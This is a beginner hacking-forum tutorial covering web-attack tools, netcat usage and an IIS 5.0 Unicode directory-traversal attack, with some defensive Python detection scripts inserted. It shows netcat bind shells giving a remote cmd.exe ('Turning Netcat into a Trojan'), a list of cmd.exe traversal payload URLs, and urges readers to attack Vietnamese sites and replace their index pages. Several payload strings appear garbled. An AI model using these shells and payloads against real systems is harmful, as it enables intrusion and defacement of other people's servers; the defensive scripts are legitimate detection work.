The Most Basic Understanding to Become a Hacker - Part 8

47.) Tools needed to hack the Web:

Professional hackers do not need these tools: they install the same version of the software that the victim's web site runs on their own machine and hunt for the bug there. For those new to the trade, however, these tools are essential; use them a few times and you will learn how to combine them to find the flaw on the victim site fastest. Here are some of the tools you need on your "working" machine:

Tool 1: A proxy, used to hide your IP and get past a firewall when needed. (How to set up a proxy I showed in part 7, please look back at it.)
Tool 2: You need a shell account, which is really important. A good shell account is one that lets you run the main programs such as nslookup, host, dig, ping, traceroute, telnet, ssh and ftp, and compile C exploits with MinGW, Cygwin and other dev tools.
A shell account is similar to a DOS shell, but it has more commands and functions than DOS. Normally when you install Unix you will have a shell account; if you do not install Unix you should register for one on a free shell network, or if someone else has installed Unix and set up a shell account for you, you can log in to it over telnet (Start -> Run -> type Telnet). Here are some places where you can register a free shell account:
http://www.freedomshell.com/
http://www.cyberspace.org/shell.html
http://www.ultrashell.net/

Tool 3: NMAP is a fast, powerful scanning tool. It can scan across a wide area network and is especially good on a single network. NMAP shows you which services are running on the server (services/ports: web server, FTP server, POP3, ...), what server software is running, what kind of firewall the server is using, and so on. In general NMAP supports most scanning techniques, such as ICMP (ping sweep), IP protocol, Null scan, TCP SYN (half open), ... NMAP is considered the leading tool of hackers as well as network administrators around the world.
All information about NMAP can be found at http://www.insecure.org/
Tool 4: Stealth HTTP Security Scanner is a great security scanner for Win32. It can scan for more than 13000 security bugs and identify another 5000 exploits.
Tool 5: IntelliTamper is a tool that displays the structure of a web site, including folders and files; it can list both the directories and the files that have a password set. Very convenient for hacking a web site, because before you hack a site you have to gather some information about the admin and the site.
Tool 6: Netcat is a tool for reading and writing data over the network via TCP or UDP. You can use Netcat directly or use other scripts to control Netcat. Netcat counts as an exploit tool because it can establish a connection between you and the server for reading and writing data (of course, once Netcat is installed on a vulnerable server). All information about Netcat can be found at http://www.l0pht.com/
Tool 7: ActivePerl is a tool that runs *.pl Perl files, because exploits are usually written in Perl. It is also used to execute commands through .pl files.
Tool 8: Linux is the operating system most hackers use.
Tool 9: L0phtCrack is the number one tool for cracking Windows NT/2000 passwords.
I have not given download links here; when you download, pay attention to the version and take the one with the highest version number, because it will have some features that the previous version did not have. If you do not know how to use a tool, look for the old posts with instructions in the "Occupation" box. If you still cannot find the post, ask and the others will answer you.

48.) Netcat Manual:

a.) Introduction: Netcat is an indispensable tool if you want to hack a web site, because it is very powerful and handy. So you need to know a bit about Netcat.
b.) Compiling:
Netcat for Linux must be compiled before use.
Edit the netcat.c file using vi: vi netcat.c
+ find the line res_init(); in main() and put // in front of it to comment it out: // res_init();
+ add the following two lines to the #define block (at the beginning of the file):

#define GAPING_SECURITY_HOLE
#define TELNET

- make linux
- run: ./nc -h
- if you want to run Netcat as nc instead of ./nc, just modify the PATH environment variable in the ~/.bashrc file by adding `:.` at the end:
PATH=/sbin:/usr/sbin:...:.
(Putting the current directory on PATH is a well-known risk: any directory you cd into can then shadow a system command with a file of the same name. Copying nc into a directory that is already on PATH avoids this.)
Netcat for Windows does not need compiling, because it ships as the binary nc.exe. Just unpack and run.
c.) The options of Netcat:
Netcat runs in command-line mode. Run nc -h to get the following parameters:

CODE
C:\>nc -h
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
-d ------------- detach Netcat from the command window or console; Netcat runs in stealth mode (not shown in the Taskbar)
-e prog -------- execute program prog, commonly used in listening mode
-h ------------- show this help
-i secs -------- delay secs milliseconds before sending each line of data
-l ------------- put Netcat into listen mode to wait for incoming connections
-L ------------- force Netcat to "keep" listening: it listens again every time a connection is closed
-n ------------- use IP addresses in numeric form only, such as 192.168.16.7; Netcat will not query DNS
-o file -------- write a hex dump of the traffic to file
-p port -------- specify the port
-r ------------- ask Netcat to select random ports
-s addr -------- spoofed source IP address addr
-t ------------- do not send extra information in a telnet session. When you telnet to a telnetd, telnetd usually requires your telnet client to send extra information such as the TERM and USER environment variables. If you use netcat with the -t option to telnet, netcat will not send this information to telnetd.
-u ------------- use UDP (by default netcat uses TCP)
-v ------------- show detailed information about the current connection
-vv ------------ show even more detailed information
-w secs -------- set the timeout for each connection to secs milliseconds
-z ------------- zero I/O mode, usually used when scanning ports
Netcat supports port ranges. The syntax is port1-port2. For example, 1-8080 means 1, 2, 3, ..., 8080.


d.) Learning Netcat through examples:

_ Grabbing the banner of a web server:

For example, nc to 172.16.84.2, port 80:

CODE

C:\>nc 172.16.84.2 80
HEAD / HTTP/1.0 (press Enter twice here)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2000 20:51:37 GMT
Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2
OpenSSL/0.9.6 PHP/4.0.4pl1
Connection: close
Content-Type: text/html
For detailed connection information, use -v (-vv gives even more detail):

CODE

C:\>nc -vv 172.16.84.1 80
172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [172.16.84.1] 80 (?) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2000 14:46:43 GMT
Server: Apache/1.3.20 (Win32)
Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT
ETag: "0-cec-3899eaea"
Accept-Ranges: bytes
Content-Length: 3308
Connection: close
Content-Type: text/html
sent 17, rcvd 245: NOTSOCK
If you want to log the session, use -o <file_name>. For example: nc -vv -o nhat_ki.log 172.16.84.2 80

Then open the file nhat_ki.log and see what it has written:

CODE

< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 #  GMT..Server: Ap
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb 
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec-
< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f #  3308..Connectio
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
< 000000f0 6c 0d 0a 0d 0a                                  # l....
< means data the server sent to netcat
> means data netcat sent to the server
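As an added example, not code from the original post or from Netcat itself, the Python script below reads the kind of -o hex dump shown above, rebuilds the bytes that travelled in each direction, and parses the reconstructed response into a status line and header map, which is exactly the banner information the HEAD trick earlier in this section is after. The dump lines embedded in it are constructed for the example (a HEAD request and a short reply); the grab_banner() function is an assumed helper that sends the same HEAD request over a plain socket and is not needed for the offline part.

```python
"""Rebuild a Netcat -o hex dump and extract the HTTP server banner from it (added example)."""
import socket
from typing import Dict, Tuple

# Constructed sample in the format `nc -o file` writes: direction marker, offset, hex bytes, '#' and ASCII.
SAMPLE_HEXDUMP = """\
> 00000000 48 45 41 44 20 2f 20 48 54 54 50 2f 31 2e 30 0d # HEAD / HTTP/1.0.
> 00000010 0a 0d 0a                                        # ...
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f # .Server: Apache/
< 00000020 31 2e 33 2e 32 30 20 28 57 69 6e 33 32 29 0d 0a # 1.3.20 (Win32)..
< 00000030 0d 0a                                           # ..
"""


def parse_nc_hexdump(text: str) -> Dict[str, bytes]:
    """Return the reassembled byte stream per direction: '<' = server to netcat, '>' = netcat to server."""
    streams = {"<": bytearray(), ">": bytearray()}
    for line in text.splitlines():
        if not line or line[0] not in streams:
            continue                                 # blank lines and nc's own status messages
        fields = line.split("#", 1)[0].split()       # drop the ASCII column; keep marker, offset, hex bytes
        direction, hex_bytes = fields[0], fields[2:]
        streams[direction].extend(int(h, 16) for h in hex_bytes)
    return {k: bytes(v) for k, v in streams.items()}


def parse_http_response_head(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Split an HTTP response into its status line and a lower-cased header map."""
    head = raw.partition(b"\r\n\r\n")[0]
    lines = head.decode("iso-8859-1").split("\r\n")  # byte-transparent; no UTF-8 assumption about headers
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def server_banner(hexdump_text: str) -> str:
    """The Server header the remote side disclosed in the logged session, or '' if it sent none."""
    response = parse_nc_hexdump(hexdump_text)["<"]
    return parse_http_response_head(response)[1].get("server", "")


def grab_banner(host: str, port: int = 80, timeout: float = 5.0) -> str:
    """Assumed helper: the same HEAD request the text types into nc, sent over a plain socket."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
        raw = b""
        while b"\r\n\r\n" not in raw:
            chunk = s.recv(4096)
            if not chunk:
                break
            raw += chunk
    return parse_http_response_head(raw)[1].get("server", "")


if __name__ == "__main__":
    print(server_banner(SAMPLE_HEXDUMP))  # Apache/1.3.20 (Win32)
```

When reviewing such a log from the defender's side, the ">" stream is the more interesting one: it is a byte-exact record of what the client sent, which is what you want to compare against the web server's own access log.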
Port scanning:

Run netcat with the -z option. To scan ports faster, add -n so that netcat does not need DNS. For example, to scan TCP ports 1 to 500 of the host 172.16.106.1:
CODE

[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 443 (?) open
(UNKNOWN) [172.16.106.1] 139 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
(UNKNOWN) [172.16.106.1] 80 (?) open
(UNKNOWN) [172.16.106.1] 23 (?) open
If you need to scan UDP ports, use -u:

CODE

[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 1025 (?) open
(UNKNOWN) [172.16.106.1] 1024 (?) open
(UNKNOWN) [172.16.106.1] 138 (?) open
(UNKNOWN) [172.16.106.1] 137 (?) open
(UNKNOWN) [172.16.106.1] 123 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
Turning Netcat into a Trojan:

On the victim machine, start netcat in listen mode, using -l (listen) and -p port to specify the port to listen on, and -e <program_to_run> to make netcat execute a program when a connection arrives, usually the command shell cmd.exe (on NT) or /bin/sh (on Unix). For example:
CODE

E:\>nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.2] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: NOTSOCK
On the attacking computer, you just use netcat to connect to the victim machine on the chosen port, e.g. 8080:

CODE

C:\>nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
E:\>cd test
cd test
E:\test>dir /w
dir /w
 Volume in drive E has no label.
 Volume Serial Number is B465-452F
 Directory of E:\test
[.]  [..]  NET.EXE  head.log  NetView.exe
ntcrash.zip  password.txt  pwdump.exe
               6 File(s)        262,499 bytes
               2 Dir(s)     191,488,000 bytes free
C:\test>exit
exit
sent 20, rcvd 450: NOTSOCK
As you have seen, we can do whatever we like on the victim machine; with just a few basic commands we have taken over the other side's computer. Take a look:

CODE

E:\>nc -nvv -L -p 8080 -e cmd.exe
listening on [any] 8080 ...
In particular, with Netcat for Windows you can listen on a port that is already in the LISTENING state. Just specify a source address with -s <source_ip>. For example:

CODE

netstat -a
...
TCP    nan_nhan:domain    nan_nhan:0    LISTENING   <- port 53 is listening
...
E:\>nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53   -> listen on port 53
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 3163
On Windows NT, setting Netcat to listen does not require Administrator privileges; logging in with an ordinary user account that can start Netcat is enough.

Note: You cannot run netcat with ... -u -e cmd.exe ... or ... -u -e /bin/sh ..., because netcat will not work properly. If you want a UDP shell on Unix, use udpshell instead of netcat.
(Based on Vicky's article)
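From the defender's side, the listener shown above, including the variant parked on port 53 next to the real DNS service, is visible in the output of netstat and the process list. As an added example, not part of the original article, the Python script below joins constructed `netstat -ano` and `tasklist` output (the -o column that shows the owning PID exists on Windows XP and later, not on the Windows 2000 box in the transcript) and flags listening sockets that are owned by a relay or shell binary, or that sit on a port whose expected owner is a different image. The sample output, the SHELL_BINARIES set and the EXPECTED_OWNER table are all assumptions made for the example.

```python
"""Flag suspicious listening sockets by joining netstat and tasklist output (added example)."""
import re
from typing import Dict, List, Tuple

# Constructed sample of `netstat -ano` output (the -o column exists on Windows XP and later).
NETSTAT_SAMPLE = """\

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:53             0.0.0.0:0              LISTENING       1840
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       716
  TCP    172.16.84.1:139        0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       2216
  TCP    172.16.84.1:53         172.16.84.2:3163       ESTABLISHED     1840
"""

# Constructed sample of `tasklist` output.
TASKLIST_SAMPLE = """\

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System                           4 Console                    0         28 K
svchost.exe                    716 Console                    0      3,120 K
nc.exe                        1840 Console                    0      1,204 K
nc.exe                        2216 Console                    0      1,208 K
"""

# Assumed policy for the example: images that should never own a listening socket,
# and ports whose listener is expected to be one specific image.
SHELL_BINARIES = {"nc.exe", "ncat.exe", "cmd.exe", "powershell.exe"}
EXPECTED_OWNER = {53: "dns.exe", 135: "svchost.exe", 139: "system"}

_TASK_RE = re.compile(r"^(\S.*?)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")


def parse_tasklist(text: str) -> Dict[int, str]:
    """Map PID -> lower-cased image name; header and separator lines do not match the pattern."""
    procs: Dict[int, str] = {}
    for line in text.splitlines():
        m = _TASK_RE.match(line)
        if m:
            procs[int(m.group(2))] = m.group(1).lower()
    return procs


def parse_listeners(text: str) -> List[Tuple[int, int]]:
    """Return (port, pid) for every TCP socket in the LISTENING state."""
    listeners: List[Tuple[int, int]] = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP" and parts[3] == "LISTENING":
            port = int(parts[1].rsplit(":", 1)[1])   # works for 0.0.0.0:53 and [::]:53 alike
            listeners.append((port, int(parts[4])))
    return listeners


def find_suspicious_listeners(netstat_text: str, tasklist_text: str) -> List[Tuple[int, int, str, str]]:
    """Return (port, pid, image, reason) for listeners that violate the policy above."""
    procs = parse_tasklist(tasklist_text)
    findings: List[Tuple[int, int, str, str]] = []
    for port, pid in parse_listeners(netstat_text):
        image = procs.get(pid, "<unknown>")
        if image in SHELL_BINARIES:
            findings.append((port, pid, image, "listener is a shell or relay binary"))
        elif port in EXPECTED_OWNER and image != EXPECTED_OWNER[port]:
            findings.append((port, pid, image, f"port is normally owned by {EXPECTED_OWNER[port]}"))
    return findings


if __name__ == "__main__":
    for port, pid, image, reason in find_suspicious_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"port {port:<5} pid {pid:<5} {image:<12} {reason}")
```

The port-53 case is the one worth noting: a port-number allowlist alone would pass it, because 53 is expected to be open; only joining the socket to its owning image exposes that the listener is nc.exe rather than the DNS service.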

49.) Hacking IIS server 5.0:

IIS servers with versions before 5.0 have a bug that we can exploit, but since most people now use IIS 5.0 I will not go into the bugs of the earlier versions. Now I will show you how to hack with the ActivePerl and IE tools; you can play with the web sites in Vietnam because they have so many bugs. Let's get started.

First of all download ActivePerl and unicode.pl.
Use telnet to determine whether the web site you are attacking runs IIS server 5.0:
CODE

telnet <web_site_address> 80
HEAD / HTTP/1.0
If it does not tell us what the target is running, change port 80 to 8080, 81, 8000, 8001, etc.

After you have identified your target, at the DOS prompt type:
CODE

perl unicode.pl
Host: (type the address of the server you want to hack)
Port: 80 (or 8080, 81, 8000, 8001, depending on which port you telneted to before)
You will see the list of bugs (coded in unicode.pl) as follows:

CODE

[1] /scripts/..%0%af../winnt/system32/cmd.exe?/c+
[2] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%1pp../winnt/system32/cmd.exe?/c+
[4] /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%00qq../winnt/system32/cmd.exe?/c+
[6] /scripts/..%1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%11c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%1af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e080%af../winnt/system32/cmd.exe?/c+
[11] /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13] /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14] /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+
[15] /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?c+
[16] %c0%af%
[17] /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[18] %c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[19] %c0%af%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[20] /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
You will see all the bugs on the web site if the victim has all of them; if the victim's server only has bugs 13 and 17, the result table shows only 13 and 17.


Suppose the result table tells me the victim site has bugs 3 and 7; I then open IE and enter the corresponding code in the Address bar:
http://www.winx.com/scripts/..%C1%Pc../winnt/system32/cmd.exe?/c+   <== the bug on line 3, or
http://www.winx.com/scripts/..%1%1c../winnt/system32/cmd.exe?/c+   <== the bug on line 7
Now you have access to the victim's server, and you use DOS commands to dig out the information on it. Usually the site lives in the inetpub\wwwroot directory; then you just replace index.html with the name of your hacked page .... Okay, do not mess them up.
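The bugs listed above all rely on one defect: IIS decoded overlong UTF-8 sequences such as %c0%af (an illegal two-byte spelling of "/") and %c1%9c (an illegal spelling of "\") only after its directory-traversal check had already run on the raw path, so a check for "../" on the undecoded URL saw nothing. As an added example, not from the original article or from unicode.pl, the Python below implements a lenient decoder that accepts overlong forms the way the flawed server did, counts them, and uses it to scan constructed IIS-style log lines for traversal attempts that a naive filter on the raw URL would miss. It goes beyond the page's list in that it handles every overlong length (two to six bytes), not only the spellings shown. The log lines and their field layout are constructed for the example.

```python
"""Detect overlong-UTF-8 directory traversal (the IIS Unicode bug) in web log lines (added example)."""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_to_bytes

# Constructed sample: W3C-style lines carrying the raw request path exactly as the client sent it.
IIS_LOG_SAMPLE = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-02-04 14:50:54 172.16.84.2 GET /index.html - 200
2000-02-04 14:51:02 172.16.84.2 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2000-02-04 14:51:09 172.16.84.2 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir 200
2000-02-04 14:51:20 172.16.84.2 GET /scripts/..%e0%80%af../winnt/system32/cmd.exe /c+dir 404
2000-02-04 14:52:00 172.16.84.2 GET /products/caf%c3%a9.html - 200
"""

TRAVERSAL = re.compile(r"\.\.[\\/]")   # '..' followed by either separator, checked AFTER decoding


def _minimal_utf8_length(cp: int) -> int:
    """Number of bytes a conforming encoder uses for code point cp."""
    return 1 if cp < 0x80 else 2 if cp < 0x800 else 3 if cp < 0x10000 else 4


def lenient_utf8_decode(data: bytes) -> Tuple[str, int]:
    """Decode UTF-8 the way the vulnerable decoder did, accepting overlong forms.

    Returns (text, number_of_overlong_sequences). A strict decoder (e.g. bytes.decode)
    rejects such sequences; this one maps them to the code point they spell, so the
    path the server actually acted on becomes visible to the analyst.
    """
    out: List[str] = []
    overlong = 0
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:                       # plain ASCII
            out.append(chr(b))
            i += 1
            continue
        # Lead-byte patterns 110xxxxx .. 1111110x announce 1..5 continuation bytes.
        for mask, value, extra in ((0xE0, 0xC0, 1), (0xF0, 0xE0, 2), (0xF8, 0xF0, 3),
                                   (0xFC, 0xF8, 4), (0xFE, 0xFC, 5)):
            if b & mask == value:
                break
        else:                              # stray continuation byte, or 0xFE/0xFF
            out.append("\ufffd")
            i += 1
            continue
        cp = b & (0xFF >> (extra + 2))     # payload bits of the lead byte
        tail = data[i + 1:i + 1 + extra]
        if len(tail) != extra or any(t & 0xC0 != 0x80 for t in tail):
            out.append("\ufffd")           # truncated or malformed sequence
            i += 1
            continue
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        if extra + 1 > _minimal_utf8_length(cp):
            overlong += 1                  # e.g. C0 AF spells '/', which needs a single byte
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += 1 + extra
    return "".join(out), overlong


def analyze_path(raw_path: str) -> Dict[str, object]:
    """Percent-decode a request path, decode it leniently, and look for traversal."""
    decoded, overlong = lenient_utf8_decode(unquote_to_bytes(raw_path))
    return {"decoded": decoded, "overlong": overlong,
            "traversal": bool(TRAVERSAL.search(decoded))}


def scan_iis_log(text: str) -> List[Tuple[int, str, Dict[str, object]]]:
    """Return (line_number, raw_path, analysis) for every request that used overlong encoding or traversed."""
    hits: List[Tuple[int, str, Dict[str, object]]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line or line.startswith("#"):
            continue                       # directives and blank lines
        fields = line.split()
        raw_path = fields[4]               # cs-uri-stem in the constructed layout above
        result = analyze_path(raw_path)
        if result["overlong"] or result["traversal"]:
            hits.append((lineno, raw_path, result))
    return hits


if __name__ == "__main__":
    for lineno, path, result in scan_iis_log(IIS_LOG_SAMPLE):
        print(lineno, path, "->", result["decoded"], "overlong:", result["overlong"])
```

The mitigation follows directly from the decoder: canonicalize (percent-decode, then strictly decode UTF-8, rejecting any overlong form) before the path check, never after it, and treat any overlong sequence in a request as hostile on its own, since no legitimate client emits one.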

GOOD LUCK !!!!!!!!!!!!!!!

(End of Section 8)

Anhdenday
HVAonline